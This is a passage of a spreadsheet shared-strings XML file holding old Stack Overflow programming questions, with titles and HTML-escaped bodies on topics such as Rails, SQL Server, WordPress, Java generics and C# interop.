    <t>How do you do relative time in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a Rails application, but can't seem to find how to do relative time, i.e. if given a certain Time class, it can calculate "30 seconds ago" or "2 days ago" or if it's longer than a month "9/1/2008", etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Test Driven Design for iPhone Native apps</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm experimenting with the iPhone SDK and doing some TDD ala Dr. Nic's rbiPhoneTest project. I'm wondering how many, if any, have been successful using this or any other testing framework for iPhone/Cocoa? More important, I'd like to know how to best assert a proprietary binary request/response protocol. The idea is to send a binary request over the network and receive a binary response. Requests and responses are created using byte and'ing and or'ing. I'm using the golden copy pattern to test my request. Here's what I have so far. Don't laugh as I'm new to btoh Objective C and Ruby:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require File.dirname(__FILE__) + '/test_helper'
require 'fileutils'
require 'io'
require "MyModel.bundle"
OSX::ns_import :MyModel
module MyTestExtensions
  def is_absolute_path(path)
    return /^\/.*/.match(path)
  end
  def parent_directory(file)
    dir = file
    if(! is_absolute_path(dir))
      dir = File.expand_path(dir)
    end
    dir = File.dirname(dir)
    assert is_absolute_path(dir), "Expecting an absolute path with #{dir}"
    return dir
  end
  def assert_NSData_contains_bytes_from_file(file, data)
  	assert_not_nil data, "Data should not be nil."
    assert data.bytes, "data should have bytes"
    data.length.times { |i|
      expected = file.getc
      assert_not_nil expected, "Expected only #{i} bytes. Actual data contains more."
      actual = data.bytes.int8_at(i)
      assert_equal expected, actual, "Bytes should be equal at offset #{i} expected #{expected.chr} but was #{actual.chr}"
    }
    expected = file.getc
    raise AssertionFailedError, "Expecting #{expected.chr} at offset #{data.length}" unless expected == nil
  end
end
class TestMyModel &amp;lt; Test::Unit::TestCase
include OSX
include MyTestExtensions
  def this_files_dir
    return parent_directory(__FILE__)
  end
  def setup
    @expectedReq = File.new("#{this_files_dir}/ExpectedMyReq")
    # @expectedReq = File.new("#{this_files_dir}/hello.txt")
    assert File.exist?("#{this_files_dir}/ExpectedMyReq"), "The file [#{@expectedReq.path}] should exist."
  end
  def test_my_model_class_exists
    MyModel
  end
  def test_can_init_instance
    assert MyModel.instancesRespondToSelector(:init), "MyModel Should define :init"
  end
  def test_my_model_can_request_my_data
	myModel = MyModel.alloc.init
	data = myModel.requestMyData 'Some query text'
	assert_NSData_contains_bytes_from_file @expectedReq, data
  end
end
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are the main differences between XHTML and HTML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the main differences between XHTML and HTML? Which one is better in your opinion, and why? Do most browsers support both?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript slider</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a 'slider' for a client's site. The slider should allow people to select how many items they want of x item, and show what the price will be based on that. The weird(ish) part is that the ratio of the price increase will go down as the amount of items goes up:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1 item: $100&lt;/li&gt;
&lt;li&gt;2 items: +90 = $190&lt;/li&gt;
&lt;li&gt;3 items: + 80 = $270&lt;/li&gt;
&lt;li&gt;4 items: + 70 = $340&lt;/li&gt;
&lt;li&gt;5 items: + 60 = $400&lt;/li&gt;
&lt;li&gt;6 items: + 50 = $450&lt;/li&gt;
&lt;li&gt;7 items: + 50 = $500&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And all increases from then on are +50. This probably seems like an overly simplistic question, but does anyone know how I could go about doing this? I have almost no experience with JavaScript :( &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically send keystrokes to GLUT application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an OpenGL/GLUT program running on my linux machine that views a 3D model from various angles and can take screenshots, and everything is controlled from the keyboard.  I want to write a script that moves around the model in a particular way, taking screenshots at every step.  It seems there should be a simple way in Linux to send keystrokes to this application from a script.  Anyone know how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way I can retrieve sa password in sql server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just forgot the password. Can anyone help me how to get back the password.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java version names in Sun's bug database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In
&lt;a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6525150" rel="nofollow"&gt;http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6525150&lt;/a&gt;
it says
Release Fixed 7(b14), 6u2(b01) (Bug ID:2147561)&lt;/p&gt;
&lt;p&gt;What does 6u2 mean? (Am I right in assuming it as 1.6.0_02 ?) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I only store fixed-size data elements in a database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If the amount of data stored within a given field of a database is unknown, and could be very large, should I store it in an external file rather than within a field in the database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you write a block of c++ code inside C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I heard somewhere that you can drop down to C++ directly inside C# code. 
How is this done?  Or did I hear wrong?&lt;/p&gt;
&lt;p&gt;Note: I do not mean C++ / CLI.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to use SqlBulkCopy to fill a really large table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Nightly, I need to fill a SQL Server 2005 table from an ODBC source with over 8 million records. Currently I am using an insert statement from linked server with syntax select similar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Insert Into SQLStagingTable from Select * from OpenQuery(ODBCSource, 'Select * from SourceTable')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is really inefficient and takes hours to run. I'm in the middle of coding a solution using SqlBulkInsert code similar to the code found in &lt;a href="http://stackoverflow.com/questions/127152/how-to-change-slow-parametrized-inserts-into-fast-bulk-copy-even-from-memory"&gt;this question&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;The code in that question is first populating a datatable in memory and then passing that datatable to the SqlBulkInserts WriteToServer method. &lt;/p&gt;
&lt;p&gt;What should I do if the populated datatable uses more memory than is available on the machine it is running (a server with 16GB of memory in my case)?&lt;/p&gt;
&lt;p&gt;I've thought about using the overloaded ODBCDataAdapter &lt;a href="http://msdn.microsoft.com/en-us/library/59wzthcw(VS.80).aspx" rel="nofollow"&gt;fill&lt;/a&gt; method which allows you to fill only the records from x to n (where x is the start index and n is the number of records to fill). However that could turn out to be an even slower solution than what I currently have since it would mean re-running the select statement on the source a number of times.&lt;/p&gt;
&lt;p&gt;What should I do? Just populate the whole thing at once and let the OS manage the memory? Should I populate it in chunks? Is there another solution I haven't thought of?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Identify full vs half yearly datasets in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table with two fields of interest for this particular exercise: a CHAR(3) ID and a DATETIME.  The ID identifies the submitter of the data - several thousand rows.  The DATETIME is not necessarily unique, either.  (The primary keys are other fields of the table.)&lt;/p&gt;
&lt;p&gt;Data for this table is submitted every six months.  In December, we receive July-December data from each submitter, and in June we receive July-June data.  My task is to write a script that identifies people who have only submitted half their data, or only submitted January-June data in June.&lt;/p&gt;
&lt;p&gt;...Does anyone have a solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuring WordPress .htaccess to view subfolders</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WordPress installation with an &lt;code&gt;.htaccess&lt;/code&gt; file that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# BEGIN WordPress
&amp;lt;IfModule mod_rewrite.c&amp;gt;
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
&amp;lt;/IfModule&amp;gt;
# END WordPress
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried installing a fresh copy of WordPress into a subdirectory for a separate blog and am getting 404 errors within the root WordPress when I try to view it. I'm assuming this is because of the &lt;code&gt;.htaccess&lt;/code&gt; file. &lt;/p&gt;
&lt;p&gt;How do I change it so that I can view the subfolder?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP: Best way to extract text within parenthesis?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best/most efficient way to extract text set between parenthesis? Say I wanted to get the string "text" from the string "ignore everything except this (text)" in the most efficient manner possible.&lt;/p&gt;
&lt;p&gt;So far, the best I've come up with is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fullString = "ignore everything except this (text)";
$start = strpos('(', $fullString);
$end = strlen($fullString) - strpos(')', $fullString);
$shortString = substr($fullString, $start, $end);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better way to do this? I know in general using regex tends to be less efficient, but unless I can reduce the number of function calls, perhaps this would be the best approach? Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Triple Curly Bracing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been given some code with commenting unlike anything I've come across before:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//{{{ Imports
import imports;
//}}}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is the same for each method block,  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//{{{ above the code block  
//}}} below the code block
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
&lt;strong&gt;ALSO SEE: &lt;a href="http://en.wikipedia.org/wiki/Folding_editor" rel="nofollow"&gt;http://en.wikipedia.org/wiki/Folding_editor&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to extract the second level domain from the HTTP_Host Variable in VBScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to extract only the 2nd level part of the domain from request.servervariables("HTTP_HOST") what is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add NUnit in Visual Studio</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write test cases for my application. I've chosen NUnit. Please let me know how to add NUnit to my Visual Studio IDE. where can I download them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross-platform editor control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a cross-platform editor control to use as GUI-part in an in-house tool. The control may be commercial, but with reasonable price.&lt;/p&gt;
&lt;p&gt;Required features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Platforms: Win32, OS X, Linux&lt;/li&gt;
&lt;li&gt;UTF-8 support&lt;/li&gt;
&lt;li&gt;Fine-grained run-time control to the text style (or at least color)&lt;/li&gt;
&lt;li&gt;Nice low-level plain C API without usual horrible bloat&lt;/li&gt;
&lt;li&gt;Should not prevent me to have these features (even if I'll have to implement them myself):
&lt;ul&gt;
&lt;li&gt;Undo / Redo&lt;/li&gt;
&lt;li&gt;Copy / Paste&lt;/li&gt;
&lt;li&gt;Context menu, depending on click position in text&lt;/li&gt;
&lt;li&gt;Toolbar, depending on cursor position in text&lt;/li&gt;
&lt;li&gt;Sidebar panel, depending on cursor position in text&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Actually above requires not simple control, but whole cross-platform GUI library.&lt;/p&gt;
&lt;p&gt;Discarded options:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Scintilla and descendants&lt;/li&gt;
&lt;li&gt;FLTK&lt;/li&gt;
&lt;li&gt;Fox-toolkit&lt;/li&gt;
&lt;li&gt;gtksourceview&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Note: I've slipped in some half-written discard reasoning here, I apologize. Scintilla indeed does work on OS X. However, if I get it correctly, Scintilla's API is in C++.  &lt;/p&gt;
&lt;p&gt;Use-case:&lt;/p&gt;
&lt;p&gt;My use-case is to write custom "semi-rigid" logic editor, where user is free to copy-paste around, add comments where he wishes, even type in text directly if he wish. But text structure is a rigid natural language representation of logic tree (somewhat AST-like in nature). I plan to write something intellisense-like (or code-template-like) to be used as the main authoring tool (instead of typing logic by hand).&lt;/p&gt;
&lt;p&gt;BTW, storage format would not be plain text, but instead internal representation of mentioned logic tree (with comments and whitespaces etc. metainfo).&lt;/p&gt;
&lt;p&gt;So, I have all necessary information to render text in needed colors by myself. I do not need any external lexers etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the easiest/best/most correct way to iterate through the characters of a string in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;StringTokenizer&lt;/code&gt;? Convert the &lt;code&gt;String&lt;/code&gt; to a &lt;code&gt;char[]&lt;/code&gt; and iterate over that? Something else?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drop Down List with WPF Menu Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to add a drop down list in WPF to a menu. This used to be really easy in winforms and so I am expecting you experts to know just now to do it in WPF. Thanks.&lt;/p&gt;
&lt;p&gt;Sorry if this is a bad question, it is late and I don't want to think.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java2D Performance Issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having performance oddities with Java2D. I know of the sun.java2d.opengl VM parameter to enable 3D acceleration for 2D, but even using that has some weird issues. &lt;/p&gt;
&lt;p&gt;Here are results of tests I ran:&lt;/p&gt;
&lt;p&gt;Drawing a 25x18 map with 32x32 pixel tiles on a JComponent&lt;br&gt;
Image 1 = .bmp format, Image 2 = A .png format&lt;/p&gt;
&lt;h2&gt;Without -Dsun.java2d.opengl=true&lt;/h2&gt;
&lt;p&gt;120 FPS using .BMP image 1&lt;BR&gt;
13 FPS using .PNG image 2&lt;/p&gt;
&lt;h2&gt;With -Dsun.java2d.opengl=true&lt;/h2&gt;
&lt;p&gt;12 FPS using .BMP image 1&lt;BR&gt;
700 FPS using .PNG image 2&lt;/p&gt;
&lt;p&gt;Without acceleration, I'm assuming some kind of transformation is taking place with every drawImage() I do in software, and is pulling down the FPS considerably in the case of .PNG. Why though, with acceleration, would the results switch (and PNG actually performs incredibly faster)?! Craziness!&lt;/p&gt;
&lt;p&gt;.BMP Image 1 is translated to an image type of TYPE_INT_RGB. .PNG Image 2 is translated to an image type of TYPE_CUSTOM. In order to get consistent speed with and without opengl acceleration, I have to create a new BufferedImage with an image type of TYPE_INT_ARGB, and draw Image 1 or Image 2 to this new image. &lt;/p&gt;
&lt;p&gt;Here are the results running with that:&lt;/p&gt;
&lt;h2&gt;Without -Dsun.java2d.opengl=true&lt;/h2&gt;
&lt;p&gt;120 FPS using .BMP image 1&lt;BR&gt;
120 FPS using .PNG image 2&lt;/p&gt;
&lt;h2&gt;With -Dsun.java2d.opengl=true&lt;/h2&gt;
&lt;p&gt;700 FPS using .BMP image 1&lt;BR&gt;
700 FPS using .PNG image 2&lt;/p&gt;
&lt;p&gt;My real question is, can I assume that TYPE_INT_ARGB will be the native image type for all systems and platforms? I'm assuming this value could be different. Is there some way for me to get the native value so that I can always create new BufferedImages for maximum performance? &lt;/p&gt;
&lt;p&gt;Thanks in advance...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I change OutDir variable in Visual C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the linker the binary destination is specified as:&lt;/p&gt;
&lt;p&gt;$(OutDir)\$(ProjectName).exe&lt;/p&gt;
&lt;p&gt;I've looked through every setting and I can't see where OutDir is defined. How do I change this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if OS is Vista in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How, in the simplest possible way, distinguish between Windows XP and Windows Vista, using Python and &lt;a href="http://python.net/crew/mhammond/win32/Downloads.html"&gt;pywin32&lt;/a&gt; or &lt;a href="http://www.wxpython.org/"&gt;wxPython&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;Essentially, I need a function that called will return True iff current OS is Vista:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; isWindowsVista()
True
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can you list the keyword arguments a Python function receives?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dict, which I need to pass key/values as keyword arguments.. For example..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;d_args = {'kw1': 'value1', 'kw2': 'value2'}
example(**d_args)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine, &lt;em&gt;but&lt;/em&gt; if there are values in the d_args dict that are not accepted by the &lt;code&gt;example&lt;/code&gt; function, it obviously dies.. Say, if the example function is defined as &lt;code&gt;def example(kw2):&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is a problem since I don't control either the generation of the &lt;code&gt;d_args&lt;/code&gt;, or the &lt;code&gt;example&lt;/code&gt; function.. They both come from external modules, and &lt;code&gt;example&lt;/code&gt; only accepts some of the keyword-arguments from the dict..&lt;/p&gt;
&lt;p&gt;Ideally I would just do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;parsed_kwargs = feedparser.parse(the_url)
valid_kwargs = get_valid_kwargs(parsed_kwargs, valid_for = PyRSS2Gen.RSS2)
PyRSS2Gen.RSS2(**valid_kwargs)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I will probably just filter the dict, from a list of valid keyword-arguments, but I was wondering: &lt;strong&gt;Is there a way to programatically list the keyword arguments the a specific function takes?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can anyone recommend a Java rich text editor?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The rich text editor must be implemented in Java, provide Swing support, and preferably be open source.&lt;/p&gt;
&lt;p&gt;I'm looking to integrate it into an existing Java/Swing application. &lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse Abstract Syntax Tree Programmatic Access</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could you provide an example of accessing the Eclipse Abstract Syntax Tree programmatically for a given piece of code?&lt;/p&gt;
&lt;p&gt;eg getting the AST for:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Class1.java&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;package parseable;
public class Class1 {
/**
 * @param args
 */
public static void main(String[] args) {
	System.out.println("Hello world!");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best implementation of STL for VS2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using default implementation of STL for VS2005 and I'm &lt;a href="http://stackoverflow.com/questions/186494/ifstr1str2-versus-ifstr1lengthstr2length-str1str2"&gt;not really satisfied&lt;/a&gt; with it. Perhaps there is something better?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Skip file lines until a match is found, then output the rest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can write a trivial script to do this but in my ongoing quest to get more familliar with unix I'd like to learn efficient methods using built in commands instead.&lt;/p&gt;
&lt;p&gt;I need to deal with very large files that have a variable number of header lines. the last header line consists of the text 'LastHeaderLine'. I wish to output everything after this line. (I'm not worried about false positive matches.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you optimise your Javascript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well... simple question, right? But with no so simple answers.
In firefox i use firebug console (profile) but... what to do in other browsers? Like Internet Explorer / Opera / Safari (on windows)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VMWare ctrl-z key binding, how to remove</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I &lt;kbd&gt;Alt&lt;/kbd&gt;+&lt;kbd&gt;Tab&lt;/kbd&gt; to my VM from my host the VM does not get keyboard input until I click inside it.  This is causing me an issue as it looks like the VM has control of the input (as the cursor is flashing away).  If while in this state, VMWare server has the focus rather then the application inside it, if you do &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;Z&lt;/kbd&gt; (normally for undo) it &lt;strong&gt;suspends&lt;/strong&gt; the VM.&lt;/p&gt;
&lt;p&gt;This is driving me barmey.  I have looked through all the options and preferences in VMWare Server and can't find anyway to disable this.&lt;/p&gt;
&lt;p&gt;Anyone know how to disable this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't I use a type argument in a type parameter with multiple bounds?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I understand &lt;i&gt;that&lt;/i&gt; the following doesn't work, but &lt;i&gt;why&lt;/i&gt; doesn't it work?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;interface Adapter&amp;lt;E&amp;gt; {}
class Adaptulator&amp;lt;I&amp;gt; {
    &amp;lt;E, A extends I &amp;amp; Adapter&amp;lt;E&amp;gt;&amp;gt; void add(Class&amp;lt;E&amp;gt; extl, Class&amp;lt;A&amp;gt; intl) {
        addAdapterFactory(new AdapterFactory&amp;lt;E, A&amp;gt;(extl, intl));
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;add()&lt;/code&gt; method gives me a compile error, "Cannot specify any additional bound Adapter&amp;lt;E&amp;gt; when first bound is a type parameter" (in Eclipse), or "Type parameter cannot be followed by other bounds" (in IDEA), take your pick.&lt;/p&gt;
&lt;p&gt;Clearly you're just Not Allowed to use the type parameter &lt;code&gt;I&lt;/code&gt; there, before the &lt;code&gt;&amp;amp;&lt;/code&gt;, and that's that. (And before you ask, it doesn't work if you switch 'em, because there's no guarantee that &lt;code&gt;I&lt;/code&gt; isn't a concrete class.) But why not? I've looked through Angelika Langer's FAQ and can't find an answer.&lt;/p&gt;
&lt;p&gt;Generally when some generics limitation seems arbitrary, it's because you've created a situation where the type system can't actually enforce correctness. But I don't see what case would break what I'm trying to do here. I'd say maybe it has something to do with method dispatch after type erasure, but there's only one &lt;code&gt;add()&lt;/code&gt; method, so it's not like there's any ambiguity...&lt;/p&gt;
&lt;p&gt;Can someone demonstrate the problem for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SqlDataReader.HasRows returns false since SQL 2008 upgrade</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an ASP.NET 2.0 website that connects to a SQL database. I've upgraded the SQL server from 2000 to 2008 and since then, one page refuses to work. &lt;/p&gt;
&lt;p&gt;I've worked out the problem is that the call to SqlDataReader.HasRows is returning false even though the dataset is not empty and removing the check allows the loop through reader.Read() to access the expected data. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    _connectionString = WebConfigurationManager.ConnectionStrings["SQLServer"].ConnectionString;
    SqlConnection connection = new SqlConnection(_connectionString);
    SqlCommand command = new SqlCommand(searchtype, connection);
    SqlParameter _parSeachTerm = new SqlParameter("@searchterm", SqlDbType.VarChar, 255);
    _parSeachTerm.Value = searchterm;
    command.Parameters.Add(_parSeachTerm);
    command.CommandType = CommandType.StoredProcedure;
    try
    {
        connection.Open();
        SqlDataReader reader = command.ExecuteReader();
        if (reader.HasRows) //this always returns false!?
        {
            while (reader.Read())
            {...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anybody have any idea what's going on? There are similar code blocks on other pages where HasRows returns the correct value.&lt;/p&gt;
&lt;p&gt;EDIT- Just to clarify, the stored procedure DOES return results which I have confirmed because the loop runs through fine if I remove the HasRows check. Changing just the name of the SQL server in the connection string to an identical database running on SQL 2000 makes the problem go away. I've checked that NOCOUNT is off, so what else could make HasRows return false when that's not the case??&lt;/p&gt;
&lt;p&gt;EDIT2- Here's the SP&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE PROCEDURE StaffEnquirySurnameSearch
@searchterm varchar(255)
AS
SELECT  AD.Name, AD.Company, AD.telephoneNumber, AD.manager, CVS.Position, CVS.CompanyArea, CVS.Location, CVS.Title, AD.guid AS guid,
AD.firstname, AD.surname
FROM ADCVS AD
LEFT OUTER JOIN CVS ON
AD.Guid=CVS.Guid 
WHERE AD.SurName LIKE @searchterm
ORDER BY AD.Surname, AD.Firstname
GO
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Many thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Virtual 360Âº, stitching and presentation software, for use on PHP driven website?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;EDITED (after 1st answer):&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Can anyone help by pointing to some good references for the creation and presentation of a 3D environment (a real room) on a website.&lt;/p&gt;
&lt;p&gt;Ideally it will not involve too much expense or too high a learning curve as this is a one off requirement for a small project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design question: How can I access an IPC mechanism transparently?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do this (no particular language):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print(foo.objects.bookdb.books[12].title);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;book = foo.objects.bookdb.book.new();
book.title = 'RPC for Dummies';
book.save();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where foo actually is a service connected to my program via some IPC, and to access its methods and objects, some layer actually sends and receives messages over the network.&lt;/p&gt;
&lt;p&gt;Now, I'm not really looking for an IPC mechanism, as there are plenty to choose from. It's likely not to be XML based, but rather s. th. like Google's protocol buffers, dbus or CORBA. What I'm unsure about is how to structure the application so I can access the IPC just like I would any object.&lt;/p&gt;
&lt;p&gt;In other words, how can I have OOP that maps transparently over process boundaries?&lt;/p&gt;
&lt;p&gt;Not that this is a design question and I'm still working at a pretty high level of the overall architecture. So I'm pretty agnostic yet about which language this is going to be in. C#, Java and Python are all likely to get used, though.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enterprise Library Database Trace Listener?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using EntLib v4 for Logging and currently I'm saving the events to the default text file listener.&lt;/p&gt;
&lt;p&gt;I would like to use MS SQL database as my event sink and I saw that the database listener is already provided, but I don't know how to create logging database and stored procedures?&lt;/p&gt;
&lt;p&gt;After googling around I saw that in v3 the database creation scripts were shipped with the EntLib, but I can't find them in v4.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What navigation control would you choose to use in your application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;ToolStrip with MenuStrip or RibbonBar? &lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;It combines both of the controls. It also have a TabPages navigation, contextual tabs, etc. However the RibbonBar is a very complex control and when you open a new document in for example Word2007 the half of the screen you see a Ribbon Bar. It is not cool. When you have toolStrips you can layout them to Top, Bottom, Left, Right and have more control of the UI look. We can also hide the toolstrips which we do not want to see and they no longer take any screen space. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Instantiating a C++ class in C# using P/Invoke via a pointer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am importing the CreateICeeFileGen() function from the unmanaged DLL mscorpe.dll in a C# application, in order to  generate a PE file. This function returns a pointer to an C++ object &lt;a href="http://msdn.microsoft.com/en-us/library/ms404463.aspx" rel="nofollow"&gt;defined here&lt;/a&gt;, is there any way I can access fields from this class via C# or do I need to write an unmanaged wrapper DLL?&lt;/p&gt;
&lt;p&gt;The code I'm using currently is as follows:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[DllImport(@"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorpe.dll", EntryPoint = "CreateICeeFileGen")]
static extern void CreateICeeFileGen(out IntPtr iceeFileGenPointer);
...
IntPtr filePtr;
CreateICeeFileGen(out filePtr);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;N.B.&lt;/strong&gt;: I know you can do similar things with .net libraries but I need to use unmanaged libraries for my purposes.&lt;/p&gt;
&lt;p&gt;Thanks in advance!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Beanstalk like Functionality</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm finally getting my team to embrace source code management now that we're working on projects where more than one dev is touching the same codebase, and I setup a free/trial account on Beanstalk for hosted Subversion so people could get a taste of how it works.&lt;/p&gt;
&lt;p&gt;That said, we've discussed a somewhat ambitious plan to put a lot of needed/wanted functionality into a single server we can run ourselves, and while I think that's great, we're still working without SCM as those plans slowly form.&lt;/p&gt;
&lt;p&gt;In the interim, I'd like to setup a temporary SVN server, but was wondering if there are any F/OSS packages that we could setup that would provide Beanstalk like functionality (i.e. the nice web interface/management setup).  I'm not overly concerned with the core-language of the package unless I'd need to hack on the code for the system itself, in which case I'm reasonably comfortable with PHP, Perl, and .NET, though I could probably pickup (an)other language(s) as needed.  That said, I'd like to steer clear of .NET or any other technology that would necessitate a Windows license.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows workflow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just want to learn 'Windows workflow' designer in .net right from the basics, can anyone suggest a good link please&lt;/p&gt;
&lt;p&gt;thanks
sandeep&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to display one value and store another on .net comboboxes?</t>
  </si>
  <si>
